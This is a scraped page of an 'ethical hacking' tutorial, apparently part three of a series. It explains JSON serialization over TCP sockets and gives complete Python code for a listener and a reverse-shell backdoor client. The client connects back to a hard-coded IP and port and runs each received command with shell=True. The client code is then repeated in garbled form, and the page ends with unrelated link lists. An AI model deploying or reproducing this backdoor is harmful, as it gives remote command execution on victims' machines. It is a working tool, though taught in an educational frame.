BACKDOORS Sockets

Problem:

  • TCP is stream-based.
  • Difficult to identify the end of message/batch.

Solution:

  • Make sure the message is well defined.
  • Implement a protocol that sends and receives methods conform to.
    • Send the size of the message as a header.
    • Append an end-of-message mark to the end of each message.
    • Serialize the message.

BACKDOORS Serialization

Benefits:

  • Message is well defined, receiver knows if message is incomplete.
  • Can be used to transfer objects(lists, dicts ...etc)

Implementation:

  • JSON and Pickle are common solutions.
  • JSON(Javascript Object Notation) is implemented in many programming languages.
  • Represents objects as text.
  • Widely used when transferring data between clients and servers.

Server Side - Listener Code:

#!/usr/bin/env python

import socket

import json

class Listener:

    def __init__(self, ip, port):

        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        listener.bind((ip, port))

        listener.listen(0)

        print("[+] Waiting for incoming connections")

        self.connection, address = listener.accept()

        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def execute_remotely(self, command):

        self.reliable_send(command.decode())

        return self.reliable_receive()

    def run(self):

        while True:

            command = input(">> ").encode()

            result = self.execute_remotely(command)

            print(result)

my_listener = Listener("10.0.0.43", 4444)

my_listener.run()

Client Side - Backdoor code:

#!/usr/bin/env python

import json

import socket

import subprocess

class Backdoor:

    def __init__(self, ip, port):

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def execute_system_command(self, command):

        return subprocess.check_output(command, shell=True)

    def run(self):

        while True:

            command = self.reliable_receive()

            command_result = self.execute_system_command(command)

            self.reliable_send(command_result.decode())

        connection.close()

my_backdoor = Backdoor("10.0.0.43", 4444)

my_backdoor.run()

Execute result:

#!/usr/bin/env pythonimport jsonimport socketimport subprocess

class Backdoor:    def __init__(self, ip, port):        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        self.connection.connect((ip, port))
    def reliable_send(self, data):        json_data = json.dumps(data).encode()        self.connection.send(json_data)
    def reliable_receive(self):        json_data = ""        while True:            try:                json_data = json_data + self.connection.recv(1024).decode()                return json.loads(json_data)            except ValueError:                continue
    def execute_system_command(self, command):        return subprocess.check_output(command, shell=True)
    def run(self):        while True:            command = self.reliable_receive()            command_result = self.execute_system_command(command)            self.reliable_send(command_result.decode())        connection.close()

my_backdoor = Backdoor("10.0.0.43", 4444)my_backdoor.run()

Python Ethical Hacking - BACKDOORS(3)的更多相关文章

  1. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  2. Python Ethical Hacking - BACKDOORS(1)

    REVERSE_BACKDOOR Access file system. Execute system commands. Download files. Upload files. Persiste ...

  3. Python Ethical Hacking - BACKDOORS(7)

    Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: ...

  4. Python Ethical Hacking - BACKDOORS(6)

    File Upload: A file is a series of characters. Uploading a file is the opposite of downloading a fil ...

  5. Python Ethical Hacking - BACKDOORS(5)

    File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read th ...

  6. Python Ethical Hacking - BACKDOORS(4)

    REVERSE_BACKDOOR - cd command Access file system: cd command changes current working directory. It h ...

  7. Python Ethical Hacking - BACKDOORS(2)

    Refactoring - Creating a Listener Class #!/usr/bin/env python import socket class Listener: def __in ...

  8. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  9. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

随机推荐

  1. Java 从入门到进阶之路(二十四)

    在之前的文章我们介绍了一下 Java 中的  集合框架中的Collection 的泛型,本章我们来看一下 Java 集合框架中的Collection 的子接口 List. Collection 接口有 ...

  2. 微信小程序-页面栈

    在小程序中以栈的形式维护了当前的所有页面 当发生路由切换的时候,页面栈的表现如下: 初始化:新页面入栈 打开新页面:新页面入栈(调用 API wx.navigateTo 或使用组件 <navig ...

  3. 【DMCP】2020-CVPR-DMCP Differentiable Markov Channel Pruning for Neural Networks-论文阅读

    DMCP 2020-CVPR-DMCP Differentiable Markov Channel Pruning for Neural Networks Shaopeng Guo(sensetime ...

  4. 云计算课程实验之安装Hadoop及配置伪分布式模式的Hadoop

    一.实验目的 1. 掌握Linux虚拟机的安装方法. 2. 掌握Hadoop的伪分布式安装方法. 二.实验内容 (一)Linux基本操作命令 Linux常用基本命令包括: ls,cd,mkdir,rm ...

  5. Python方法函数记录

    目录 python 控制台输出的内容保存到txt 文件 eval函数使用 python 控制台输出的内容保存到txt 文件 import sys class Logger(object): def _ ...

  6. Digix2019华为算法精英挑战赛代码

    Digix2019华为算法精英挑战赛代码 最终成绩: 决赛第九 问题 根据手机型号,颜色,用户偏好,手机APP等信息预测用户年龄. https://developer.huawei.com/consu ...

  7. js语法基础入门(2)

    2.变量 2.1.变量的声明 声明变量的时候没有赋值,默认输出undefined //通过var 声明一个变量 var user: //默认输出undefined 可以同时声明多个变量 var use ...

  8. Zuul请求超时

    最近在弄springcloud的时候发现在发送短信的时候zuul总是报错,错误信息如下 com.netflix.zuul.exception.ZuulException: at org.springf ...

  9. 对于python 作用域新的理解

    今天看Python习题,看到如下题目 def num(): return [lambda x: i*x for i in range(4)] print([m(2) for m in num()]) ...

  10. 113资讯网——NGINX 502 Bad Gateway——解决方案

    NGINX 502 Bad Gateway错误出现的原因较多,对于后端连接PHP服务的场景下,常见的原因有php服务响应超时,php进程不足等引起的一类服务器错误. 发生原因: PHP FastCGI ...